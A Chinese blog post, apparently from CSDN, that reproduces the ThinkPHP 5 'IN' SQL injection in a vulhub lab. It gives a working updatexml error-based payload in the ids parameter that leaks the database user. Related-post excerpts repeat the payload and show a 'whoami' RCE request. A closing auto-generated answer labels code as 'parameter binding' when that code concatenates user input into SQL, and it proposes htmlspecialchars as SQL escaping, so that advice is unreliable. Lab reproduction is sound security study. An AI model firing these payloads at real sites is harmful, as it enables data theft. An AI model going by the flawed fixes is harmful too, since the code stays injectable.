Thinkphp in-sqlinjection复现

原创 已于 2023-08-19 04:52:52 修改 · 164 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

于 2023-08-19 04:51:57 首次发布

Thinkphp in-sqlinjection复现

原理

在 Builder 类的 parseData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生

过程

访问时加上下面的playload就可以获取敏感信息

/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

微信公众号:猫蛋儿安全

[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露
qq_51577576的博客
09-29 1989
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 Thinkphp5X设计缺陷导致泄漏数据库账户密码
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 1050
关于vulhub中thinkPHP SQL注入的漏洞复现及其简单的原理介绍
buuctf [ThinkPHP]IN SQL INJECTION
qq_1873822的博客
03-19 1228
打开这样的 爆出用户名密码 ?ids[]=1&ids[]=2 错误回显敏感信息,数据库名 ?ids[0,updatexml(0,concat(0xa,user()),0)]=1 漏洞原理 https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html https://www.secpulse.com/archives/59120.html ...
[ThinkPHP]IN SQL INJECTION1
weixin_51558394的博客
08-17 427
[ThinkPHP]IN SQL INJECTION 1
thinkphp漏洞复现】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1879
参考文章:https://blog.youkuaiyun.com/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
Thinkphp--in-sqlinjection
m0_74402888的博客
04-27 530
在 Builder 类的 parseData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。影响版本在相应的文件夹位置打开终端后进行如下操作。
thinkphp-in-sqlinjection漏洞复现
2301_76467680的博客
06-28 216
拉取镜像完成后本机访问虚拟机IP。
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1889
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现(详细图解)
鱼溯的博客
02-02 2990
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现(详细图解)
Python武器库开发-武器库篇之Thinkphp5 SQL注入漏洞(六十六)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-24 1138
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
白话sql注入(sql Injection)系统总结
weixin_54603520的博客
03-23 1231
数据库就是一个存储数据的仓库,数据库是以一定方式存储在一起,能与多个用户共享,具有尽可能小的冗余,与应用程序彼此独立的数据集合。mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,
vulhub-thinkphp漏洞复现
qq_51922767的博客
09-14 3001
vulhub-thinkphp漏洞复现
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2616
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
漏洞复现ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1704
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
ThinkPHP3.2.X SQL注入漏洞的解决方案
amaoatao的博客
03-09 3760
程序部分 1.入口文件加入SQL关键字过滤(立刻要做), API的有多维数据的需要注意 2.任何密码要有等级检测, 密码位数提高到8位以上 3.纯数字的支付密码也要有安全检测, 如’123456’的密码将不能通过 4.登录/支付密码连续错误5次账号暂停24小时(后台参数可设置) 5.密码要先在本地加密(SHA1) 6.涉及API接口对接的项目全部使用AES加密(每个项目最好使用不同的密...
mysql in sql注入_在 SQL 注入攻击中检查数据库
weixin_36431489的博客
01-27 493
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy >>Examining the database >>Examining the database in SQL injection attacks...当利用 SQL 注入利用时,收集数据库本身的信息通常是必要的。这包括数据库软件的类型和版本,还包括数据...
ThinkPHP最新版本SQL注入漏洞
weixin_30631587的博客
01-23 648
如下controller即可触发SQL注入: code 区域 public function test() { $uname = I('get.uname'); $u = M('user')->where(array( 'uname' => $uname ))->f...
sql injection violation, syntax error: ERROR
热门推荐
fwk_love的博客
12-14 4万+
Error querying database. Cause: java.sql.SQLException: sql injection violation, syntax error: ERROR. pos 998, line 14, column 41, token ON : select解决方法:关键字冲突 今天在改sql语句的时候遇到了这个问题,困扰了我许久,话不多说,看实例: 解析异常...
[ThinkPHP]IN SQL INJECTION这个题怎么做
最新发布
10-14
ThinkPHP中,防范SQL注入是非常重要的,尤其是在处理来自用户输入的数据时。针对`IN` SQL Injection的题目,你可以采取以下几种策略: 1. **预处理语句(Prepared Statements)**: 使用PDO或mysqli这样的ORM库,它们支持预编译语句。将用户输入作为参数传递给预处理语句,而不是直接拼接到SQL查询字符串中。这样可以防止恶意用户插入额外的SQL代码。 ```php $stmt = $pdo->prepare('SELECT * FROM table WHERE id IN(?)'); $stmt->execute([$idsFromInput]); ``` 2. **参数化绑定(Parameter Binding)**: 如果你正在使用原生SQL,使用占位符(`?`)代替硬编码值,然后动态关联参数数组。 ```php $sql = 'SELECT * FROM table WHERE id IN (' . implode(',', $inputIds) . ')'; $result = $db->query($sql); ``` 3. **转义输入**: 对用户输入进行适当的转义,但这不是最佳实践,因为可能会失去SQL的原有语法。只在必要时进行转义,如处理特殊字符。 ```php $escapedIds = htmlspecialchars(implode(',', $inputIds), ENT_QUOTES, 'UTF-8'); $sql = "SELECT * FROM table WHERE id IN ($escapedIds)"; ``` 4. **限制函数权限**: 限制数据库连接对象的`exec`、`eval`等可能导致代码执行的函数,以防间接注入。 5. **使用ORM框架提供的安全特性**: ThinkPHP本身也提供了一些安全措施,比如`Think\Db`类,利用其构造函数或方法来防止SQL注入。 总之,在处理用户输入时,始终优先使用预处理语句或参数化查询,这能最大程度地降低SQL注入的风险。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值